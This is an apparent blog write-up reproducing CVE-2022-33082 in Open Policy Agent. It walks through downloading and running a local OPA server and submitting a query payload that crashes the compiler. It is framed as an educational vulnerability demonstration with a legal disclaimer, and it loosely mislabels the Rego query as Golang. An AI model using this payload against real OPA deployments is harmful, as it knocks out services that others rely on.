CVE 2022–33082 Practical Exploitation

I have developed the first known practical exploit for CVE 2022–33082, “an issue in the AST parser (ast/compile.go) of Open Policy Agent v0.10.2, allowing attackers to cause a Denial of Service (DoS) via a crafted input”.

Explanation of the components of CVE 2022–33082

Open Policy Agent, known as OPA, provides policy based control for cloud native environments. This allows cloud administrators to use a single policy framework for all services in their cloud framework, so that all of the services play by the same rules and can work with one another. OPA utilizes a tool called an Abstract Syntax Tree Parser, or AST parser. The AST parser is used in the OPA compiler to analyze and break down the structure of the high-level programming language for the compiler to understand. The AST parser for OPA is written in Golang, a modern object-oriented programming language developed by Google.

The Denial of Service occurs when an attacker utilizes a local variable to override a function. When this happens, the system will infinitely attempt to make the function call until it exhausts all of its resources doing so. Furthermore, if a hacker uses the input function and variable, they will cause a compiler panic, which causes the entirety of the compiler to fail.

Exploitation of CVE 2022–33082

With this information, we can execute an attack on vulnerable versions of OPA. Any version v0.41.0 or lower is vulnerable to this attack. To execute this attack on the system, we will download and run a local version of OPA on Linux. (You can use a Docker container or a virtual machine for this if you don’t run Linux on bare metal. If you absolutely want to use Mac or Windows, you can find the binaries here.)

# Download the program from the Internet - pick the proper version for your processor:

# amd64
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static

# arm64
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_arm64_static

You will then need to make the program executable:

sudo chmod +x opa

Then, you can deploy the server:

./opa run --server

Then, navigate to localhost:8181 in your favorite web brower. You will see the OPA page pop up with two fields: the query field and the JSON input field. The query field is where we wil submit the Golang payload. The JSON input field is how OPA takes in information. We can put anything we want as the actual ‘input’. See below!

// This code goes in the query field
p := [input() | input := 1]

{ "input":"put this in the input field!" }

Now hit ‘submit’! You should see a bunch of text pop up in the terminal where you deployed the server! Scroll up and you’ll see the compiler panic!!!

Implications

Anyone with web access to an OPA server version 0.41.0 or lower can completely crash the server. This server is not password protected by default and automates many important cloud processes, causing a major loss of Availability, a major security principle.

Credits and Resources

Special thanks to Johan Fylling for initially finding this vulnerability. You can find him on Github and Twitter

My Github repository with the exploitation method can be found at https://github.com/cyberqueenmeg/cve-2022-33082-exploit

Megan Howell is a cybersecurity student at Grand Canyon University and an Offensive Security Intern at Cisco Systems. She is a bug bounty hunter, has been featured in Forbes Magazine for her work in AI Bias hunting, open source contributor to programs like BeeF and BlackArch Linux, former DefCon speaker, SkillsUSA Cybersecurity national competitor, National Cyber Scholar, and Cyber Patriot competitor. You can find her social media profiles at linktr.ee/cyberqueenmeg.

DISCLAIMER

The information presented above can be used for both beneficial and malicious purposes. I do not condone or endorse the use of this information for malicious purposes and will fully support the prosecution of those who use the information presented above in a manner that violates the law. You are only authorized to utilize this information on your own systems or on systems you are explicitly authorized to penetration test or perform bug bounties on. If you use this exploit in a malicious manner, you will be charged and prosecuted to the full extent of the laws surrounding unethical hacking and cyber crime.